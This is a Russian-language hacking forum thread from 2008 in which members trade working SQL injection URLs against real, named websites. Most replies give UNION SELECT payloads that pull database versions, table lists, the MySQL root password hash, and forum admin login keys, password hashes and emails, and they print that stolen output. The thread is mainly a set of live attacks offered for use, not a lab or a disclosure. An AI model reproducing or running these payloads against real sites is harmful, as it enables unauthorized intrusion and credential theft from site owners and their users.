09.08.2008, 10:46
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
кто поможет
http://evo.nightspirits.net/indexframe.php?razdel=registration'
вот нашёл такую дыру кто скажет можно её дальше раскроить? |
|
|
09.08.2008, 14:05
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от superboys
кто поможет
вот нашёл такую дыру кто скажет можно её дальше раскроить?
Код:
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),char(58),user()))),6,7,8,9/*
Кстати там ещё таблица users есть.
|
|
|
|
10.08.2008, 11:55
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
Сообщение от Grey
Код:
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),char(58),user()))),6,7,8,9/*
Кстати там ещё таблица users есть. можно попонятнее разъяснить где что я нуп))
|
|
|
|
10.08.2008, 13:49
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
|
|
|
|
10.08.2008, 01:20
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Вот мой не похек (((( помогите пожалуйстА!
http://football.kapook.com/webboard_view_guest.php?qid='4595
http://mrdriver.com/device.php?id=33714'
http://driversdb.com/device.php?id=107971'
2 последних..вообще как одинаковые...
Последний раз редактировалось DDoSька; 10.08.2008 в 02:11..
|
|
|
|
10.08.2008, 01:27
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
K1nD[e]R, mysql.userS не существует. Есть mysql.user
|
|
|
|
10.08.2008, 05:21
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
DDoSька
http://football.kapook.com/team.php?id=13%27+union+select+1,2,3,4,5,6,7,conca t(0x3a,user,0x3a,password),9,10,11,12,13,14,15,16, 17,18,19,20+from+mysql.user/*
:root:612382396d951d43
http://mrdriver.com/device.php?id=-33714%27+union+select+version()/*
5.0.24-standard
Не будем перебирать все таблицы и посмотрим на сайт.
Стоит форум mybb пробуем табл mybb_users
http://mrdriver.com/device.php?id=-33714%27+union+select+concat(uid,0x3a,loginkey,0x3 a,password,0x3a,email,0x3a,icq)+from+mybb_users+li mit+0,1/*
1:sekysvwGmEE5uCfSHMKdK1uAUdrykTa6XkwLbNSnsxli1Q2D 7h:24a1de6ebae6c9497fac8e1c328d8fa2:webmaster@mrdr iver.com:
Всё зашифровал))) гад.
http://driversdb.com/device.php?id=-107971%27+union+select+concat(uid,0x3a,loginkey,0x 3a,password,0x3a,email,0x3a,icq)+from+mybb_users+l imit+0,1/*
1:7T6Jlse4WHMFWtJax9OsOVgLqmWoufnlzPDkCtHGFleS9YZm W4:e7cf5c7cf184622332e2bc347a38659a:forum@driversd b.com:
Последний раз редактировалось tor4); 10.08.2008 в 05:41..
|
|
|
|
10.08.2008, 14:15
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
Да уже всё репку накинул))
|
|
|
|
10.08.2008, 14:50
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
Код:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите новичку дальше незнаю что делать  |
|
|
|
10.08.2008, 15:59
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
Сообщение от S0ulVortex
Код:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите новичку дальше незнаю что делать _http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,0+from+users/*
Код HTML:
Table [banners] Table [catalog] Table [catalog_picture] Table [catalog_struct] Table [catalog_text] Table [db_pics] Table [feature_bind] Table [feature_group] Table [feature_type] Table [fotobank] Table [invoice] Table [link_catalog] Table [manufactures] Table [news] Table [pages] Table [pricelist] Table [tovar] Table [users]
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
